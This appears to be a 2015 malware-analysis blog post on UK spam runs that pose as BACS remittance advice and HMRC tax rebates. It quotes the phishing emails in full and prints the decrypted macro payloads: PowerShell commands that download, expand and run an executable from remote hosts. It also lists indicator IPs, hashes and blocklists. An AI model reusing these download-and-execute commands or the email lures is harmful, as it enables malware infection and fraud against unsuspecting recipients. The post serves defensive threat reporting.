The file is then saved as %TEMP%\fJChjfgD675eDTU.exe  which has a VirusTotal detection rate of 3/57. According to this Malwr report, it attempts to connect to the following IPs:

188.225.77.216 (TimeWeb Co. Ltd, Russia)
42.117.1.88 (FPT Telecom Company, Vietnam)
31.41.45.211 (Relink Ltd, Russia)
87.236.215.103 (OneGbits, Lithuania)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)

It also drops a couple more malicious binaries with the following MD5s:

8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
53ba28120a193e53fa09b057cc1cbfa2 [VT 4/57]

Recommended blocklist:
188.225.77.216
42.117.1.88
31.41.45.211
87.236.215.103
104.232.32.119
188.120.243.159

Malware spam: BACS "Remittance Advice" / HMRC "Your Tax rebate"

These two malware spam runs are aimed at UK victims, pretending to be either a tax rebate or a BACS payment.

From:    Long Fletcher
Date:    11 March 2015 at 09:44
Subject:    Remittance Advice

Good Morning,

Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.

Please note this may show on your account as a payment reference of FPALSDB.

Kind Regards
Long Fletcher
Finance Coordinator


Attachment: LSDB.xls

----------

From:    Vaughn Baker
Date:    11 March 2015 at 09:27
Subject:    Your Remittance Advice [FPABHKZCNZ]

Good Morning,

Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.

Please note this may show on your account as a payment reference of FPABHKZCNZ.

Kind Regards
Vaughn Baker
Senior Accountant

----------

From:    HMRC
Date:    11 March 2015 at 10:04
Subject:    Your Tax rebate

Dear [redacted],

After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.

To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).

Regards, HM Revenue Service. We apologize for the inconvenience.

The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved

Sample attachment names:

HMRC: 196XQBK.xls, 89WDZ.xls
BACS: LSDB.xls, Rem_8392TN.xml (note that this is actually an Excel document, not an XML file)

All of these documents have low detection rates [1] [2] [3] [4] and contain these very similar malicious macros (containing sandbox detection algorithms) [1] [2] [3] [4] which when decrypted attempt to run the following Powershell commands:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://93.170.123.36/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.190/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.177/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
These are probably compromised hosts, for the record they are:

193.26.217.39 (Servachok Ltd, Russia)
93.170.123.36 (PE Gornostay Mikhailo Ivanovich, Ukraine)
85.143.166.190 (Pirix, Russia)
46.30.42.177 (EuroByte / Webazilla, Russia)

These download a CAB file, and then expand and execute it. This EXE has a detection rate of 4/57 and automated analysis tools [1] [2] show attempted traffic to:

95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
188.120.226.6 (TheFirst.RU, Russia)
188.165.5.194 (OVH, France)

According to this Malwr report it drops two further malicious files with the following MD5s:

c6cdf73eb5d11ac545f291bc668fd7fe
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]

Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177